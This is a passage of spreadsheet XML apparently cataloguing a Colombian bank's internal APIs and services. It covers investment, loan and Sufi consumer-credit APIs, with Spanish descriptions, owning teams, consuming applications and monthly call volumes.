    <s v="Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores.  Inicialmente, la API tendrá las siguientes capacidades: 1.Consultar los clientes registrados 2. Consulta de cuentas locales inscritas por el cliente en el canal. 3. Consulta de cuentas internacionales inscritas por el cliente en el canal."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <n v="8"/>
    <n v="2"/>
    <n v="75"/>
    <n v="92"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-23T09:17:40"/>
    <s v="Investment Channel"/>
    <n v="100"/>
    <s v="Investment Channel - Management"/>
    <n v="100"/>
    <x v="270"/>
    <s v="Esta API permite exponer las capacidades para gestionar los clientes en los diferentes canales del banco"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-17T19:15:08"/>
    <s v="Investment Customer"/>
    <n v="111"/>
    <s v="Investment Customer Personal Data - Information"/>
    <n v="111"/>
    <x v="271"/>
    <s v="Permite realizar la consulta de los datos personales de los clientes que tienen inversiones administradas por Valores Bancolombia"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="88076"/>
    <n v="160821"/>
    <n v="94299"/>
    <n v="86298"/>
    <n v="74860"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-26T19:44:43"/>
    <s v="Investment Notifications"/>
    <n v="102"/>
    <s v="Investment Notifications - Notifications"/>
    <n v="102"/>
    <x v="272"/>
    <s v="Permite notificar a los clientes que tienen inversiones administradas por Valores Bancolombia a través de correo electrónico y SMS."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001"/>
    <n v="2527"/>
    <n v="4084"/>
    <n v="2396"/>
    <n v="2598"/>
    <n v="3968"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-12-19T01:48:57"/>
    <s v="Investments Channel"/>
    <n v="100"/>
    <s v="Investments channel  - customer"/>
    <n v="100"/>
    <x v="273"/>
    <s v="Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores.  Inicialmente, la API tendrá las siguientes capacidades: 1.Consultar los clientes registrados 2. Consulta de cuentas locales inscritas por el cliente en el canal. 3. Consulta de cuentas internacionales inscritas por el cliente en el canal."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-01-04T09:35:21"/>
    <s v="Investments Channel"/>
    <n v="110"/>
    <s v="Investments channel  - customer"/>
    <n v="110"/>
    <x v="273"/>
    <s v="Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores.  Inicialmente, la API tendrá las siguientes capacidades: 1.Consultar los clientes registrados 2. Consulta de cuentas locales inscritas por el cliente en el canal. 3. Consulta de cuentas internacionales inscritas por el cliente en el canal."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204"/>
    <n v="8"/>
    <n v="1"/>
    <n v="11"/>
    <n v="11"/>
    <n v="42"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Linea Unica"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" El servicio LineaUnica, representa la virtualización en el WebSphere Message Broker (WMB) de una funcionalidad que expone el aplicativo de Gestión de Cobranzas ADMINFO para la validación de información requerida por parte de terceros sobre el abogado (aliado estratégico o empresa de cobranza) asociado al crédito que posea un cliente en condición de dificultad crediticia."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="Adminfo_Adminfo_AW0157001"/>
    <s v="Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Listado Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Las cuentas de ahorro y corrientes son productos financieros de alta demanda por parte de los clientes y en ese sentido es necesario que el banco tenga la capacidad de acceder a la información de estas cuentas. El objetivo de este servicio es agrupar todas las capacidades de consulta de información NO monetaria de los productos de cuentas depósitos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1177 _x000d__x000a_AW1203001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-26T15:56:29"/>
    <s v="Loan"/>
    <n v="100"/>
    <s v="Loan - Balances"/>
    <n v="100"/>
    <x v="274"/>
    <s v="La API Loan Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos LAA: Préstamo retail, CLA: Préstamo corporativo que se encuentren activos en las Filiales del exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosCreditos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-29T15:30:06"/>
    <s v="Loan"/>
    <n v="110"/>
    <s v="Loan - Disbursements"/>
    <n v="100"/>
    <x v="275"/>
    <s v="Esta API cuenta con capacidades que permiten la creación obligaciones crediticias y diversas formas de disponibilización de sus recursos."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="PROFIN_PRODUCTORCONSUMIDOR _x000d__x000a_ AW1313001_VTD_Rediferidos_Back _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="23"/>
    <n v="9"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-05T14:13:07"/>
    <s v="Loan"/>
    <n v="110"/>
    <s v="Loan - Loans"/>
    <n v="101"/>
    <x v="276"/>
    <s v="Esta API cuenta con capacidades que permiten la consulta de préstamos de un cliente así­ como de detalles de una obligación."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="PROFIN_PRODUCTORCONSUMIDOR _x000d__x000a_ AW1313001_VTD_Rediferidos_Back _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-27T17:09:18"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="201"/>
    <s v="Loan Additional Information"/>
    <n v="101"/>
    <x v="277"/>
    <s v="La API Loans Sufi study consume - Loan additional information tiene como objetivo ofrecer las capacidades de diligenciamiento y consulta de los datos complementarios necesarios para iniciar la fase de instrumentación en una solicitud de crédito de consumo de Sufi y así­ permitir el desembolso al aliado."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ MONSUFI_AW1191035 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="408"/>
    <n v="606"/>
    <n v="767"/>
    <n v="3512"/>
    <n v="125382"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-06T14:20:26"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="100"/>
    <s v="Loan Application"/>
    <n v="100"/>
    <x v="278"/>
    <s v="Esta API tiene capacidades relacionadas con la gestión de una solicitud de crédito de consumo, permitiendo iniciar el proceso de estudio de crédito, consultar el estado de todas la solicitudes y detalles de una solicitud que fue aprobada. Además, contiene una capacidad de consulta que le í­ndica al usuario si es posible efectué la radicación de la solicitud que se encuentra diligenciando."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="NU0037003_VDSAUTOGESTIONCONSUMOBACK _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="310707"/>
    <n v="641937"/>
    <n v="166967"/>
    <n v="388546"/>
    <n v="259734"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-12T15:40:37"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="201"/>
    <s v="Loan Application"/>
    <n v="200"/>
    <x v="278"/>
    <s v="Esta API tiene capacidades relacionadas con la gestión de una solicitud de crédito de consumo, permitiendo iniciar el proceso de estudio de crédito, consultar el estado de todas la solicitudes y detalles de una solicitud que fue aprobada. Además, contiene una capacidad de consulta que le í­ndica al usuario si es posible efectué la radicación de la solicitud que se encuentra diligenciando. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ MONSUFI_AW1191035 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="310707"/>
    <n v="641937"/>
    <n v="166967"/>
    <n v="388546"/>
    <n v="259734"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-27T17:09:18"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="100"/>
    <s v="Loan Application Information"/>
    <n v="100"/>
    <x v="279"/>
    <s v="Esta API tiene capacidades que permiten la consulta y la creación de la información necesaria para la solicitud de un crédito de consumo en Sufi, con el propósito de su radicación posterior para que se efectué un estudio de crédito. Nota: Para la diligenciar este bloque de información se debe consumir los catalogos de referencia de sufi que entregan el dominio de valores de los campos que lo requieren. En la documentación de la operación (DO_addProductData_v1.0.0_.xlsx), en cada campo se especifica como se debe consultar dicho catálogo, de manera que se tenga para cada campo los datos de referencia que entiende el back de la API."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="NU0037003_VDSAUTOGESTIONCONSUMOBACK _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="693129"/>
    <n v="577177"/>
    <n v="472980"/>
    <n v="551060"/>
    <n v="743811"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-12T15:40:37"/>
    <s v="Loans Sufi Study Consume"/>
    <n v="201"/>
    <s v="Loan application information"/>
    <n v="110"/>
    <x v="279"/>
    <s v="Esta API tiene capacidades que permiten la consulta y la creación de la información necesaria para la solicitud de un crédito de consumo en Sufi, con el propósito de su radicación posterior para que se efectué un estudio de crédito. Nota: Para la diligenciar este bloque de información se debe consumir los catalogos de referencia de sufi que entregan el dominio de valores de los campos que lo requieren. En la documentación de la operación (DO_addProductData_v1.0.0_.xlsx), en cada campo se especifica como se debe consultar dicho catálogo, de manera que se tenga para cada campo los datos de referencia que entiende el back de la API."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ MONSUFI_AW1191035 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="693129"/>
    <n v="577177"/>
    <n v="472980"/>
    <n v="551060"/>
    <n v="743811"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-25T11:54:11"/>
    <s v="Document Service Sufi"/>
    <n v="100"/>
    <s v="Loan Documents Sufi"/>
    <n v="100"/>
    <x v="280"/>
    <s v="La API Document Service Sufi- loan documents provee capacidades relacionadas con la entrega y recuperación de documentos utilizados en el proceso de solicitud de credito y tambien posterior a esto"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ Monitoreo_AW1378001 _x000d__x000a_ MONSUFI_AW1378001"/>
    <n v="205"/>
    <n v="684"/>
    <n v="597"/>
    <n v="1285"/>
    <n v="2107"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-24T19:17:41"/>
    <s v="Loan Utilities"/>
    <n v="100"/>
    <s v="Loan Utilities - Installments"/>
    <n v="100"/>
    <x v="281"/>
    <s v="Esta API cuenta con capacidades que permiten el cálculo de cuota para créditos no desembolsados y de recálculo para créditos desembolsados."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="CalculoCuotaCredito/V1.0"/>
    <m/>
    <s v="MsUtilities_NU0102001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="2"/>
    <n v="29"/>
    <m/>
    <n v="23"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-01-27T20:17:00"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Agreements Enquiry"/>
    <n v="102"/>
    <x v="282"/>
    <s v="Esta API expone métodos que permiten la consulta datos básicos de convenios empresariales de cartera los cuales pueden ser de libranza, seguros, DAI, ONGs o fundaciones, etc"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="AdministracionConveniosCartera/V1.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-06T22:39:54"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Enquiry"/>
    <n v="222"/>
    <x v="283"/>
    <s v="Api que permite la consulta de los préstamos que tenga un cliente o un convenio empresarial, la consulta detallada y los movimientos de un préstamo en particular."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaInformacionPrestamos/V2.0"/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <n v="1695225"/>
    <n v="1455563"/>
    <n v="1467864"/>
    <n v="1312363"/>
    <n v="1617573"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-05-26T11:34:39"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Loan Applications"/>
    <n v="100"/>
    <x v="284"/>
    <s v="En su versión inicial, esta API expone capacidades que permiten consultar los detalles relacionados con solicitudes de crédito radicadas, así­ como actualizar el estado de éstas, haciendo posible, en parte, la gestión de este proceso previo al desembolso del crédito."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="SolicitudDeCredito/V1.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-01-27T20:17:00"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Maximum Loan Amount"/>
    <n v="111"/>
    <x v="285"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaDatosCartera/V2.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <n v="17"/>
    <n v="1"/>
    <n v="33"/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-06T22:39:54"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Payment"/>
    <n v="112"/>
    <x v="286"/>
    <s v="Esta API encargada de realizar los pagos de créditos comerciales, enviando al TEF3 de la transacción 001, la cuenta, el tipo de cuenta y el valor del prestamo de cliente para aplicar su pago, retornando el numero de pagaré."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="PagoPrestamos/V2.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-25T17:41:11"/>
    <s v="Consumer Loan Sufi"/>
    <n v="111"/>
    <s v="Loans Information"/>
    <n v="101"/>
    <x v="287"/>
    <s v="API para la consulta de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Wompi_NU0093001 _x000d__x000a_ DesembolsosSufi_AW1097001 _x000d__x000a_ BotonRecaudoWompi_NU0093001"/>
    <n v="175315"/>
    <n v="264901"/>
    <n v="292700"/>
    <n v="308208"/>
    <n v="396773"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-19T15:10:59"/>
    <s v="Consumer Loan Sufi"/>
    <n v="201"/>
    <s v="Loans Information"/>
    <n v="200"/>
    <x v="287"/>
    <s v="API para la consulta de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="AW1097001 _x000d__x000a_ NU0093001 _x000d__x000a_ DesembolsosSufi_AW1097001 _x000d__x000a_ Monitoreo_AW1097001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="175315"/>
    <n v="264901"/>
    <n v="292700"/>
    <n v="308208"/>
    <n v="396773"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-19T19:33:41"/>
    <s v="Loans Sufi"/>
    <n v="101"/>
    <s v="Loans Sufi - Simulation"/>
    <n v="101"/>
    <x v="288"/>
    <s v="El API 'Simulación del Crédito'? se encarga de recibir los datos básicos, valores y plazo de un posible crédito, para proceder a generar una simulación y responder con los resultados de cuotas y demás datos de pagos que el cliente asumirá, para que con dicha información pueda tomar la decisión de iniciar la radicación del estudio de crédito. Esta API será genérica para cualquier producto o lí­nea de negocio en SUFI."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MovilidadCore_AW1281002 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="40741"/>
    <n v="30502"/>
    <n v="34254"/>
    <n v="68134"/>
    <n v="112684"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-01-27T20:17:00"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans-Collaterals"/>
    <n v="105"/>
    <x v="289"/>
    <s v="Esta API permite consultar la información general de las garantí­as  asociadas a un cliente"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaDatosCartera/V2.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <n v="919"/>
    <n v="286"/>
    <n v="793"/>
    <n v="9721"/>
    <n v="48911"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-07-21T14:49:28"/>
    <s v="Customer Data Sufi"/>
    <n v="110"/>
    <s v="Management"/>
    <n v="100"/>
    <x v="290"/>
    <s v="API para la gestión de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="adaptadorSufi_NU0204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Mantenimiento Obligaciones Cartera"/>
    <n v="100"/>
    <x v="0"/>
    <s v="En su versión inicial, este servicio expone una capacidad que permite actualizar los detalles de un préstamo en el aplicativo core Bankvision."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="AW1313 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-05-20T11:09:59"/>
    <s v="Loans Study Vehicle"/>
    <n v="101"/>
    <s v="Manual Study"/>
    <n v="101"/>
    <x v="291"/>
    <s v="API publica que permite realizar de la información adicional en que caso de requerirse un estudio manueal para el crédito de vehiculo. Esta API se toma como una tercera familia de apis, con tres capacidades que se irán ejecutando secuencialmente. Una vez realizado este registro de datos para el estudio manual, se entrega una respuesta indicando que se realizará el estudio. Esta APIs esta especificada en el contexto funcional de SUFI-Vehiculos."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VentasDigitalesSufi_NU0037 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-06T02:22:21"/>
    <s v="Loans Study Vehicle"/>
    <n v="105"/>
    <s v="Manual Study"/>
    <n v="105"/>
    <x v="291"/>
    <s v="&lt;p&gt;La capacidad expuesta por Grupo Bancolombia tiene como objetivo la radicaci&amp;oacute;n de la informaci&amp;oacute;n necesaria para realizar el estudio de cr&amp;eacute;dito para v&amp;eacute;hiculo con los siguientes pasos del proceso:&lt;/p&gt; &lt;p&gt;Los pasos a seguir en este proceso son:&lt;br /&gt;   &lt;ol&gt;&lt;li&gt;La soluci&amp;oacute;n se debe autenticar en la plataforma de APIs de Bancolombia.&lt;/li&gt;&lt;li&gt;La soluci&amp;oacute;n debe presentar los formularios para la captura de la informaci&amp;oacute;n para la radicaci&amp;oacute;n de la solicitud del cr&amp;eacute;dito, con los datos del comercio si aplica, categorizaci&amp;oacute;n del producto, datos del producto.&lt;/li&gt;&lt;li&gt;Continua con el registro de informaci&amp;oacute;n Personal (realizando la precarga de datos si es cliente Bancolombia por medio de la API de Customers) y financiera, actividad econ&amp;oacute;mica.&lt;/li&gt;&lt;li&gt;Se realiza el env&amp;iacute;o de informaci&amp;oacute;n aceptando terminos y condiciones.&lt;/li&gt;&lt;li&gt;Se realizan la validaciones de Pre-Bureau, Bureau y Pos-Bureau.&lt;/li&gt;&lt;li&gt;Generaci&amp;oacute;n autom&amp;aacute;tica de una aprobaci&amp;oacute;n, rechazo o en su defecto env&amp;iacute;o a estudio manual.&lt;/li&gt; &lt;/ol&gt;"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
